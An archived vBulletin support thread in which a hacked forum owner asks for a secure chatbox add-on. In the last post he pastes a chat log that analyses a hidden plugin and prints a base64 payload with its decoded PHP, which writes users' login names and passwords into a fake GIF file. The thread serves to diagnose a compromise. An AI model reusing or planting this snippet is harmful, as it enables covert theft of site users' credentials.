Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
Reload this Page need help with good secure chabox
FAQ Community Calendar Today's Posts Search

Reply
Page 1 of 2 1 2
 
Thread Tools Display Modes
  #1  
Old 09-09-2014, 10:47 AM
xpwmaster xpwmaster is offline
 
Join Date: Dec 2009
Posts: 39
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default need help with good secure chabox
i am using now MGC Chatbox Evo 3.4.0 , my site been hacked lately . i am afriad those kind of addons i put might made the hackers easy way in . is there any secure and safe chabox for vb anyone can recomned to me here .
Reply With Quote
  #2  
Old 09-09-2014, 10:57 AM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
This one, https://vborg.vbsupport.ru/showthread.php?t=236970
Reply With Quote
  #3  
Old 09-09-2014, 11:09 AM
blind-eddie's Avatar
blind-eddie blind-eddie is offline
 
Join Date: Apr 2006
Location: Michigan
Posts: 2,310
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by xpwmaster View Post
i am using now MGC Chatbox Evo 3.4.0 , my site been hacked lately . i am afriad those kind of addons i put might made the hackers easy way in . is there any secure and safe chabox for vb anyone can recomned to me here .
How do you know it was MGC Chatbox Evo 3.4.0 that allowed hackers to get into your site?
Reply With Quote
  #4  
Old 09-09-2014, 11:38 AM
xpwmaster xpwmaster is offline
 
Join Date: Dec 2009
Posts: 39
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
thanks ozzy . is it real secure? did anyone had problem with it ?

--------------- Added [DATE]1410266511[/DATE] at [TIME]1410266511[/TIME] ---------------

not sure if it was MGC Chatbox Evo 3.4.0 that creat that exploit . but for sure it was vsa statitics addon . so aint sure whice of those scripts are secure

--------------- Added [DATE]1410268740[/DATE] at [TIME]1410268740[/TIME] ---------------
Reply With Quote
  #5  
Old 09-09-2014, 12:22 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Yes the DBTech one is secure for sure.

How do you know it was the VSA stats mod that has a exploit?
Reply With Quote
  #6  
Old 09-09-2014, 12:22 PM
xpwmaster xpwmaster is offline
 
Join Date: Dec 2009
Posts: 39
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
i am getting error when importing the xml

The requested URL /admin/vbshout.php was not found on this server.

damm
Reply With Quote
  #7  
Old 09-09-2014, 12:26 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
You need to load the files that came with the mod before importing the XML, read the instructions in the read me file in the mods zip.
Reply With Quote
  #8  
Old 09-09-2014, 02:32 PM
xpwmaster xpwmaster is offline
 
Join Date: Dec 2009
Posts: 39
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
ya i intalled . but it isnt good like MGC Chatbox Evo whice has many great options
Reply With Quote
  #9  
Old 09-09-2014, 03:08 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
How do you know it was the VSA stats mod that has a exploit?

What features are missing?
Reply With Quote
  #10  
Old 09-09-2014, 03:50 PM
xpwmaster xpwmaster is offline
 
Join Date: Dec 2009
Posts: 39
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
had gif file when opened with notpad showed all users ad passwords .


BiGFiST> well, they added actual plugins
<FireBirD> were
<FireBirD> whice plug ins they added
<BiGFiST> see under vsa stats
<BiGFiST> two login location products
<BiGFiST> there's base64 php code
<BiGFiST> i decrypted that here http://www.base64decode.org/
<BiGFiST> JHN0ciA9ICIiLiRfUE9TVFsndmJfbG9naW5fdXNlcm5hbWUnXS 4iOiIuJF9QT1NUWyd2Yl9sb2dpbl9wYXNzd29yZCddLiJcclxu IjsgDQokZnAgPSBmb3BlbiAoImltYWdlcy9taXNjL3RyZWVfcn guZ2lmIiwgImErIik7IA0KZndyaXRlICgkZnAsICIkc3RyIik7 IA0KZmNsb3NlICgkZnApOw==
<BiGFiST> that gives
<BiGFiST> $str = "".$_POST['vb_login_username'].":".$_POST['vb_login_password']."\r\n";
<BiGFiST> $fp = fopen ("images/misc/tree_rx.gif", "a+");
<BiGFiST> fwrite ($fp, "$str");
<BiGFiST> fclose ($fp);
Reply With Quote
Reply
Page 1 of 2 1 2

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 01:54 AM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.05236 seconds
  • Memory Usage 2,251KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete